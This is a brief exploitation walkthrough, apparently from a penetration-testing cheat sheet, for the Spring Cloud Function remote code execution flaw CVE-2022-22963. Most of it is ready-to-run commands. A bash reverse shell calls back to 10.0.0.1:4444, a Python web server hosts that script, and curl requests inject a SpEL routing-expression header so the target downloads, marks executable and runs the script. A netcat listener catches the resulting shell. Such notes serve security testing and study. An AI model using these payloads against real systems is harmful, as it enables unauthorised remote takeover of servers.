Spring Cloud Function RCE

Spring Cloud Function is vulnerable to RCE (CVE-2022-22963)

- [CVE-2022-22963](https://github.com/me2nuk/CVE-2022-22963)

Exploitation

Reverse Shell

First create a reverse shell script in local machine.

#!/bin/bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

Then start a web server for uploading it.

python3 -m http.server

Now remote code execution with target website as below.

curl -X POST  https://example.com:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget http://10.0.0.1/shell -O /tmp/shell")' --data-raw 'data' -v

Our reverse shell script is uploaded.
Start a listener in local machine.

nc -lvnp 4444

Remote code execution again to reverse shell.

# As needed
curl -X POST  https://example.com:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/shell")' --data-raw 'data' -v

curl -X POST  https://example.com:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash /tmp/shell")' --data-raw 'data' -v

We should get a shell.